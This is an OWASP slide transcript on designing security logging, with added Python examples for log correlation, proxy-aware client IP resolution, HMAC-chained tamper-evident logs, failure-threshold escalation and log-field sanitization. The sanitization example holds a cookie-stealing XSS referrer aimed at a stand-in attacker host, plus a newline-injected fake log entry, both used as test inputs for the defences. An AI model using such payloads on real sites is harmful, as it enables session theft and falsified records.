TRANSCRIPT
Copyright © Eddy Vanlerberghe. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
Logging: not just a good idea
October 23, 2008
Eddy Vanlerberghe
Introduction
Logging is often not formally planned or designed
Frequently insufficient in case of incidents
Implemented by developers “as they go”
Stored in insecure locations
Relevance of logged information inadequate
Definition
“Information produced by an application that is not strictly required for its core functionality.”
Border Case: User Visible Error Messages
Volatile nature: not permanently recorded
Usually contents not intended for end-user
May reveal too much information for attackers
Often result of insecure configuration at server-side
Sometimes due to undocumented “features” of third-party components
Different Interested parties
Developer
System Administrator
Marketing
Audit
alt.hackers.malicious
...
Developer's Interest
“If an error occurs, I want to know what to modify in which lines of which files.”
Personal angle: “Look how quickly I can fix any bug!”
Security angle: minimize downtime, fix errors as soon as possible
System Administrator's Interest
“Do we need bigger iron/network pipes?”
“Why is the system reacting so slow today?”
“Where did that daemon come from and who changed my root password?”
Security angle: confidentiality, integrity and availability
Marketing Interest
“Why are people skipping that super-duper flash movie we paid big bucks for?”
Security angle: ???
Audit Interest
“It wasn't our fault and here is the proof!”
Security angle: non-repudiation, accountability
Hacker's Interest
“So, what is the name of that table containing the creditcard details in their database?”
Security angle: information leading to successful attacks, destruction or obfuscation of proof pointing in their direction
Web Server Logs
Timestamp
Remote IP address
Requested resource
Request result status and return length
127.0.0.1 - - [25/Jul/2008:14:59:20 +0200] "GET /dokuwiki/lib/exe/js.php?edit=0&write=1 HTTP/1.1" 200 16902
127.0.0.1 - - [25/Jul/2008:14:59:21 +0200] "POST /dokuwiki/doku.php HTTP/1.1" 302 -
Web Server Logs (cont.)
Full request content not available: no cookies, no POST-ed parameters
Response content not available: no cookies being set, only total length of response
IP address does not equal “Jane Doe, 1600 Pennsylvania Ave NW, Washington, DC 20500”
Are ALL requests recorded? (can errors cause logging to be skipped?)
IP address is often the internal address of a load balancer, reverse proxy or WAF
Typical Application Logs
Are usually intended for developers only (e.g. “13/10 12:13:14 Tx 88944890 started”)
Not always taking multithreading issues into account: three consecutive log entries can be from two different threads, and information of different threads may not be in chronological order
Often not part of up-front design, especially with respect to log management (backups, log rotation, access rights,...)
Transaction Related Logs
Intended to be used for official actions such as settling disputes, input for accounting (e.g. number of transactions executed per month) etc.
Part of up-front design
Should be reviewed for intended purposes:
Is logged information sufficient for intended purpose?
Is the logged data stored securely?
What are the policies and procedures for handling backups? (off-site, encrypted,...)
Example Setup
Diagram: User and Hax0r -> Internet -> SSL Terminator / Reverse Proxy -> Web Application Server
Data Flow
Web service uses one URL for all transaction requests (“/doTransaction.jsp”)
User sends cookie containing account number
Back end server executes transactions on behalf of account specified in cookie
Back end logs transaction data: time, source account, destination account, amount, description, IP address of the reverse proxy
Reverse proxy logs “POST” requests
Clocks of proxy and web server are not sync'd
Log Contents
Proxy:
1.2.3.4 - - [2008-07-11:14:59:20] "POST http://webserver/doTransaction.jsp HTTP/1.1" 200 1234
5.6.7.8 - - [2008-07-11:14:59:20] "POST http://webserver/doTransaction.jsp HTTP/1.1" 200 1122
Web Server:
10.0.0.2 - - [2008-07-11:14:57:33] "POST /doTransaction.jsp HTTP/1.1" 200 1234
10.0.0.2 - - [2008-07-11:14:57:33] "POST /doTransaction.jsp HTTP/1.1" 200 1234
Application Log:
10.0.0.2 2008-07-11:14:57:33 123456789012 210987654321 5000 Electricity
10.0.0.2 2008-07-11:14:57:33 123456789012 111222333444 5000 Electricity
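Why these three sources cannot be joined, and what fixes it, as an added example in Python (not part of the original slides). It parses the slide's own lines: a join on time fails outright because the two clocks differ by 107 seconds, and even after guessing that skew both proxy entries match both transactions, so no transaction can be pinned to a client. The second pair of logs is a hypothetical format, constructed here, in which the proxy mints a request id and forwards it together with the client address, and the application writes both into its transaction log; the join then needs neither clocks nor IP guessing.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines, taken from the slide. The proxy's clock is
# 1 min 47 s ahead of the web server's, and the application only ever sees
# the proxy's internal address 10.0.0.2, so neither time nor IP identifies
# the client behind a transaction.
PROXY_LOG = """\
1.2.3.4 - - [2008-07-11:14:59:20] "POST http://webserver/doTransaction.jsp HTTP/1.1" 200 1234
5.6.7.8 - - [2008-07-11:14:59:20] "POST http://webserver/doTransaction.jsp HTTP/1.1" 200 1122
"""
APP_LOG = """\
10.0.0.2 2008-07-11:14:57:33 123456789012 210987654321 5000 Electricity
10.0.0.2 2008-07-11:14:57:33 123456789012 111222333444 5000 Electricity
"""

# The same two events as they would look if the proxy minted a request id
# (rid), forwarded it and the client address downstream, and the application
# wrote both into its transaction log. Hypothetical format, constructed here.
PROXY_LOG_V2 = """\
1.2.3.4 - - [2008-07-11:14:59:20] "POST http://webserver/doTransaction.jsp HTTP/1.1" 200 1234 rid=7f3a91
5.6.7.8 - - [2008-07-11:14:59:20] "POST http://webserver/doTransaction.jsp HTTP/1.1" 200 1122 rid=c08e42
"""
APP_LOG_V2 = """\
7f3a91 1.2.3.4 2008-07-11:14:57:33 123456789012 210987654321 5000 Electricity
c08e42 5.6.7.8 2008-07-11:14:57:33 123456789012 111222333444 5000 Electricity
"""

TS_FMT = "%Y-%m-%d:%H:%M:%S"
PROXY_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)(?: rid=(\S+))?$')


def parse_proxy(text):
    rows = []
    for line in text.splitlines():
        m = PROXY_RE.match(line)
        if not m:
            continue  # in production: count unparseable lines and alert on them
        rows.append({"client": m.group(1),
                     "ts": datetime.strptime(m.group(2), TS_FMT),
                     "url": m.group(4), "status": int(m.group(5)),
                     "rid": m.group(7)})
    return rows


def parse_app(text, with_rid=False):
    rows = []
    for line in text.splitlines():
        fields = line.split(maxsplit=6 if with_rid else 5)
        rid = fields.pop(0) if with_rid else None
        ip, ts, src, dst, amount, desc = fields
        rows.append({"rid": rid, "ip": ip, "ts": datetime.strptime(ts, TS_FMT),
                     "src": src, "dst": dst, "amount": int(amount), "desc": desc})
    return rows


def attribute_by_time(proxy_rows, app_rows, skew_seconds=0, window_seconds=1):
    """For each transaction, the set of client IPs whose proxy entry lies within
    window_seconds of the transaction time, after shifting application time by
    the (estimated) clock skew. An empty set means no match; more than one
    element means the attribution is ambiguous and would not stand up."""
    result = []
    for a in app_rows:
        t = a["ts"] + timedelta(seconds=skew_seconds)
        result.append({p["client"] for p in proxy_rows
                       if abs((p["ts"] - t).total_seconds()) <= window_seconds})
    return result


def attribute_by_request_id(proxy_rows, app_rows):
    """Join on the id the proxy generated for the request; clocks play no part."""
    by_rid = {p["rid"]: p["client"] for p in proxy_rows if p["rid"]}
    return [by_rid.get(a["rid"]) for a in app_rows]
```

Even with the request id in place, keep the timestamps and keep the clocks synchronised: the id links proxy to application, but a timeline for a dispute or an investigation still needs a time both parties agree on.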
Typical Questions To Be Answered
Logging with security in mind: questions that need answers based on available logged information:
When? Who? What? Where? How? Why?
When?
Can be required to determine the "Who"? (typically dynamic IP addresses are re-used by multiple persons over time)
Often used to link information from different logging sources (e.g. for building timelines during forensic investigations)
Importance of accurate system clocks across all systems involved
Who?
Ask yourself: if something happens, do I have enough information to identify the culprit?
Physical person? Organization?
Remote IP address (beware of reverse proxies, load balancers or WAFs)
Indication of open WiFi being abused?
Application level identification? (usernames, account numbers,...)
May need help from law enforcement for resolving an IP address to owner information
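Resolving the real client address behind the proxies, as an added example (Python, not from the slides). The trusted network 10.0.0.0/24 and the X-Forwarded-For handling are assumptions made for the example: only hops that belong to our own proxies are stripped from the chain, anything the client put in the header itself is kept as an unverified claim rather than believed, and a value that is not an address is refused instead of being copied into the log.

```python
import ipaddress

# Assumption for this example: these networks hold only our own reverse
# proxies, load balancers and WAF. Every other address that shows up in a
# forwarding chain may have been written by the client itself.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]


def as_ip(value):
    """Parse an address or return None (clients can put anything in a header)."""
    try:
        return ipaddress.ip_address(value)
    except ValueError:
        return None


def is_trusted_proxy(value):
    ip = as_ip(value)
    return ip is not None and any(ip in net for net in TRUSTED_PROXIES)


def resolve_client(remote_addr, x_forwarded_for=None):
    """Determine the client address to log when requests arrive through
    reverse proxies that append X-Forwarded-For.

    The chain is walked from the right (the TCP peer, which we know for
    certain) leftwards, discarding hops that are our own proxies. The first
    address that is not one of our proxies is the client; everything further
    left was asserted by an untrusted party and is kept only as a claim.
    """
    hops = [h.strip() for h in (x_forwarded_for or "").split(",") if h.strip()]
    chain = hops + [remote_addr]  # leftmost = claimed origin, rightmost = TCP peer
    via = []
    while chain and is_trusted_proxy(chain[-1]):
        via.insert(0, chain.pop())
    if not chain:
        # Only our own proxies in the chain and none of them recorded a
        # client: a proxy is misconfigured, and the log must say so rather
        # than silently record 10.0.0.2 as the culprit.
        return {"client": None, "via": via, "claimed": [],
                "error": "no client address recorded by proxies"}
    candidate = chain.pop()
    if as_ip(candidate) is None:
        return {"client": None, "via": via, "claimed": chain,
                "error": "unparseable client address %r" % candidate}
    return {"client": candidate, "via": via, "claimed": chain, "error": None}
```

Log all four fields. The "claimed" addresses are worthless for attribution but useful for detection: a client that bothers to forge X-Forwarded-For is telling you something.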
What?
Ideally: all traffic going in and out
Often not realistic
Minimum:
Time
Remote IP
Resource accessed + parameters supplied
Result status + most important info returned
Diagnostics generated during handling of request
Application specific required electronic evidence (digital signatures, ...)
Where?
Identify which component generated the log entry (WAF filter? Application digital signature verification?...)
Location of intruder?
Insider? (involve human resources department?)
Domestic attacker? (case for local law enforcement?)
Foreign attacker? (block entire countries from site?)
How?
Investigate how an intrusion occurred
Which weaknesses were abused?
Can the incident occur again? (e.g. if an old server, with old software, was replaced as part of the containment, the new situation may be more secure)
What would be the most effective ways to block the intrusion from happening again? (helps to prioritize new protective measures)
Why?
Can be used to prevent attacks being launched by taking away the reason why they occurred
If disgruntled customer: keep them happier?
If disgruntled employee: look at ways to keep employees happier?
"Because I can": not much to do against that motive except building a fortress
“Secure Logging”
Implement chain-like functionality: line counters, (signed) hashes of previous record(s)
Use independent, isolated log servers in a physically controlled environment
Use write-once devices
Include digital signatures on each line provided by dedicated “notarial” systems
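A minimal version of the chain-like functionality, as an added example (Python, not from the slides): each entry carries a sequence number, the previous entry's HMAC and its own HMAC over both, and the key is assumed to live only on the isolated log server or notarial system, so a compromised application host cannot re-sign a rewritten chain. demo() shows what each kind of manipulation looks like to the verifier; anchoring the last MAC somewhere else is what makes removal of the newest records detectable.

```python
import hashlib
import hmac
import json

GENESIS = "0" * 64  # "previous MAC" of the first record


def canonical(entry):
    """Stable byte encoding of everything except the MAC itself."""
    body = {k: v for k, v in entry.items() if k != "mac"}
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def append_record(chain, key, record):
    """Append a record, linking it to the previous one by sequence number and
    by the previous record's MAC, then authenticate the whole entry."""
    prev = chain[-1] if chain else None
    entry = {"seq": prev["seq"] + 1 if prev else 1,
             "prev": prev["mac"] if prev else GENESIS,
             "record": record}
    entry["mac"] = hmac.new(key, canonical(entry), hashlib.sha256).hexdigest()
    chain.append(entry)
    return entry


def verify_chain(chain, key, expected_last_mac=None):
    """Return (ok, problems). Detects edited records, deleted or reordered
    entries and forged MACs. Removing records from the END is only detected
    if the last MAC has been anchored elsewhere (expected_last_mac), e.g. on
    the isolated log server or a notarial system."""
    problems = []
    prev_mac, expected_seq = GENESIS, 1
    for entry in chain:
        if entry["seq"] != expected_seq:
            problems.append("seq %d: expected %d (gap or reordering)" % (entry["seq"], expected_seq))
        if entry["prev"] != prev_mac:
            problems.append("seq %d: prev link does not match previous MAC" % entry["seq"])
        mac = hmac.new(key, canonical(entry), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(mac, entry["mac"]):
            problems.append("seq %d: MAC mismatch (record modified)" % entry["seq"])
        prev_mac, expected_seq = entry["mac"], entry["seq"] + 1
    if expected_last_mac is not None and (not chain or chain[-1]["mac"] != expected_last_mac):
        problems.append("chain truncated: last MAC differs from anchored value")
    return (not problems, problems)


def deep_copy(chain):
    return json.loads(json.dumps(chain))


def demo(key=b"example-key-kept-on-the-log-server"):
    """Build a three-record chain from constructed transaction records and
    show what each kind of tampering looks like to verify_chain."""
    records = [
        {"ts": "2008-07-11:14:57:33", "src": "123456789012", "dst": "210987654321", "amount": 5000},
        {"ts": "2008-07-11:14:57:33", "src": "123456789012", "dst": "111222333444", "amount": 5000},
        {"ts": "2008-07-11:14:58:01", "src": "123456789012", "dst": "555666777888", "amount": 10},
    ]
    chain = []
    for r in records:
        append_record(chain, key, r)
    anchor = chain[-1]["mac"]  # what the notarial system would hold

    edited = deep_copy(chain)
    edited[1]["record"]["amount"] = 50      # attacker rewrites an amount
    deleted = deep_copy(chain)
    del deleted[1]                          # attacker removes the second transfer
    truncated = deep_copy(chain)[:-1]       # attacker drops the newest record

    return {
        "intact": verify_chain(chain, key),
        "edited": verify_chain(edited, key),
        "deleted": verify_chain(deleted, key),
        "truncated_unanchored": verify_chain(truncated, key),
        "truncated_anchored": verify_chain(truncated, key, expected_last_mac=anchor),
    }
```

An HMAC proves integrity to whoever holds the key; for non-repudiation towards a third party the slide's digital signatures from a separate notarial system are the stronger option, and the chain structure stays the same.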
If Push Comes To Shove...
Court case: in Belgium the goal is to convince the judge(s) that you are right and the other party is wrong
Electronic evidence is different compared to paper documents
Make up for possible uncertainty by:
Redundant logging by independent systems
Show how logging is produced by automated processes
Keep several generations of backups in physically different, but secured, locations
Proactive Usage of Log Info
Implement monitoring on generated log data
Define thresholds for “interesting” events
Create progressive escalation infrastructure
Block suspected malicious outsiders
Dangers:
False positives
Blocking of legitimate users
Too many escalation alerts erode their effectiveness
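The threshold-and-escalation idea applied to access-log lines, as an added example (Python, not from the slides). The thresholds, the window, the failure statuses and the never-block list are assumed policy values, and the log lines are constructed. It shows two of the dangers being handled: each client escalates once per level, so sixty failures produce three actions rather than sixty pages, and an address that many legitimate users share is capped at an alert for a human instead of an automatic block.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[^"]*" (\d{3}) \S+')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Policy (assumed for this example): count authentication failures per
# client over a 5-minute sliding window and escalate once per level.
WINDOW = timedelta(minutes=5)
THRESHOLDS = [(5, "notice"), (20, "alert"), (50, "block")]
FAILURE_STATUSES = {401, 403}
# Addresses that many legitimate users share (a corporate NAT gateway, say):
# never auto-block them, cap them at "alert" for a human to look at.
NEVER_BLOCK = {"203.0.113.10"}


class Escalator:
    def __init__(self):
        self.events = defaultdict(deque)   # ip -> timestamps of recent failures
        self.level = {}                    # ip -> current escalation level
        self.actions = []                  # (level, ip) in the order they fired

    def observe(self, ip, ts):
        q = self.events[ip]
        q.append(ts)
        while ts - q[0] > WINDOW:
            q.popleft()
        reached = [name for threshold, name in THRESHOLDS if len(q) >= threshold]
        if not reached:
            self.level.pop(ip, None)       # window drained: allow re-escalation later
            return
        new = reached[-1]
        if new == "block" and ip in NEVER_BLOCK:
            new = "alert"
        if new != self.level.get(ip):      # fire once per level, not once per failure
            self.level[ip] = new
            self.actions.append((new, ip))


def run(lines):
    """Feed access-log lines through the escalator; return the actions taken."""
    esc = Escalator()
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        ip, ts, status = m.group(1), datetime.strptime(m.group(2), TS_FMT), int(m.group(3))
        if status in FAILURE_STATUSES:
            esc.observe(ip, ts)
    return esc.actions


def sample_lines():
    """Constructed access-log lines: a password-guessing client, a busy NAT
    gateway with a burst of failures, and an ordinary user who mistyped twice."""
    base = datetime(2008, 7, 25, 14, 59, 20, tzinfo=timezone(timedelta(hours=2)))

    def clf(ip, t, status):
        return '%s - - [%s] "POST /login HTTP/1.1" %d 512' % (ip, t.strftime(TS_FMT), status)

    lines = [clf("198.51.100.7", base + timedelta(seconds=2 * i), 401) for i in range(60)]
    lines += [clf("203.0.113.10", base + timedelta(seconds=5 * i), 401) for i in range(25)]
    lines += [clf("192.0.2.1", base + timedelta(seconds=30 * i), 401) for i in range(2)]
    lines.append(clf("192.0.2.1", base + timedelta(seconds=70), 200))
    return lines
```

Whatever blocks on the output of run() should be the proxy or WAF, not the application, and the block itself should be logged like any other action so that a false positive can be found and reversed later.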
Handling Log Data
Can contain confidential information
Plan to be able to quickly look at part of logged data (timeframe, origin based, ...)
Make backups
Plan on long-term storage
Beware of potentially dangerous contents (e.g. XSS attack as part of requested URL, referrer or user-agent string containing XSS,...)
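Neutralising dangerous request-derived fields before they are written and again before they are displayed, as an added example (Python, not from the slides). The tab-separated record format and the HTML table viewer are assumptions made for the example; the constructed inputs carry a forged log entry hidden in a user-agent (a newline followed by fake fields) and script in the referrer.

```python
import html
import re

CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def sanitize_field(value, max_len=1024):
    """Make an attacker-controlled value safe to write as ONE field on ONE
    line: the value is length-capped so a single request cannot flood the
    log, literal backslashes are doubled so a typed "\\x0a" cannot be
    mistaken for an escape, and CR/LF (which a forged entry needs), TAB (our
    field separator) and other control characters become visible escapes."""
    value = str(value)
    excess = len(value) - max_len
    if excess > 0:
        value = value[:max_len] + "...[%d more chars dropped]" % excess
    value = value.replace("\\", "\\\\")
    return CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), value)


def format_line(ts, client, method, path, status, referer, user_agent):
    """Tab-separated record; every field that came from the request goes
    through sanitize_field, the fields we generated ourselves do not need to."""
    return "\t".join([ts, client, sanitize_field(method), sanitize_field(path), str(status),
                      sanitize_field(referer), sanitize_field(user_agent)])


def render_html_row(line):
    """For a web-based log viewer: every cell is HTML-escaped, so script in a
    referrer or user-agent is displayed, not executed, in the analyst's browser."""
    return "<tr>" + "".join("<td>%s</td>" % html.escape(cell) for cell in line.split("\t")) + "</tr>"


# Constructed malicious inputs.
FORGED_UA = "Mozilla/5.0\n2008-07-25T15:00:00\t10.0.0.1\tPOST\t/admin/approve\t200\t-\t-"
XSS_REFERER = 'http://evil.example/<script>document.location="http://evil.example/?c="+document.cookie</script>'


def demo():
    line = format_line("2008-07-25T14:59:20+02:00", "1.2.3.4", "GET", "/doku.php?id=start",
                       200, XSS_REFERER, FORGED_UA)
    return {"line": line, "html": render_html_row(line)}
```

The same discipline applies to anything else that reads the logs: a terminal (escape sequences in a user-agent can rewrite what an analyst sees), a spreadsheet (fields starting with "=" ) and any tool that parses the line back into fields.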
Conclusions
Logging is an important part of non-repudiation: record not only approvals/hashes/signatures, but also the entire process
Record sufficient information to reconstruct the path from user to database
Beware of time stamps from different systems and reverse proxies
Log data can contain confidential information and should be protected as such
Proactive measures can have undesired side effects
Questions?